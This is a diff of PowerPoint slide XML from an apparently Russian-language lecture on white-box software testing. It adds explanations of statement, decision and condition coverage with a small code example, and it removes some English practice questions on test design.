+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>{ </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>if</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> ((</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> &gt; 1) &amp;&amp; (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> == 0)) </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>		</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>if</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> == 2 || </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> &gt; 1) </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>		</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x++</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>} </a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
-            <a:endParaRPr lang="en-US" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" smtClean="0"/>
-              <a:t>Тестирование </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>в период сопровождения затруднено, если технические требования являются устаревшими или отсутствуют вообще, либо </a:t>
+            <a:pPr rtl="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Чтобы выполнить каждый оператор не менее одного раза, нужно составить единственный тест со следующими значениями входных данных (</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
-              <a:t>тестировщики</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t> не обладают достаточными знаниями предметной области.</a:t>
-            </a:r>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> = 2 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> = 0 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> = 3).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr rtl="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Данный подход обладает недостатками. Вот, например, если в условии </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>&gt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> 1 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
+                <a:hlinkClick r:id="rId3" tooltip="Программист"/>
+              </a:rPr>
+              <a:t>программист</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> допускает ошибку и пишет </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>&lt;</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> 1 или </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>&gt; -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> 1, то с помощью нашего теста эта ошибка не будет обнаружена.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>покрытия методом решений </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>необходимо составить такое число тестов, при которых каждое условие в программе примет как истинное значение, так и ложное значение.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Например, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>a = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> b = 0, x = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>4 (условие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>((</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> &gt; 1) &amp;&amp; (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> == 0)) будет истинно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> и условие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>((</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> == 2 )||( </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> &gt; 1)) будет истинно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>И </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>a = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>3</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> b = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>, x = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>0 (условие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>((</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> &gt; 1) &amp;&amp; (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> == 0)) будет ложно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> и условие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>((</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> == 2 )||( </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>x</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> &gt; 1)) будет ложно</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Если программист ошибется в условии </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>a==2</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>, то с помощью наших тестов ошибка опять же не будет обнаружена.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>покрытия условий</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>, все условия (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>a&gt;1, b==0, a==2, x&gt;1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>должны принимать и ложное, и истинное значения.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>a=2,  b=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>1</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>, x=2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>a=0,  b=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>0</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>, x=0</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>При таком подходе, некоторые операторы могут не выполниться ни разу. Для более полного теста необходимо добавлять, что все операторы должны выполниться хотя бы один раз (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>комбинаторное покрытие условий</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -3838,580 +3268,117 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>TEST</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>3</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Question 1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Which of the following requirements would be tested by a functional system test?</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>A The system must be able to perform its functions for an average of 23 hours 50 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>mins</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>per day.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>B The system must perform adequately for up to 30 users.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>C The system must allow a user to amend the address of a customer.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>D The system must allow 12,000 new customers per year.</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>-----------------------------------------------------------------------------------------------------------</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Question 2</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>Considering the following pseudo-code, calculate the MINIMUM number of test cases</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>for statement coverage, and the MINIMUM number of test cases for decision </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>coverage respectively.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>READ A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
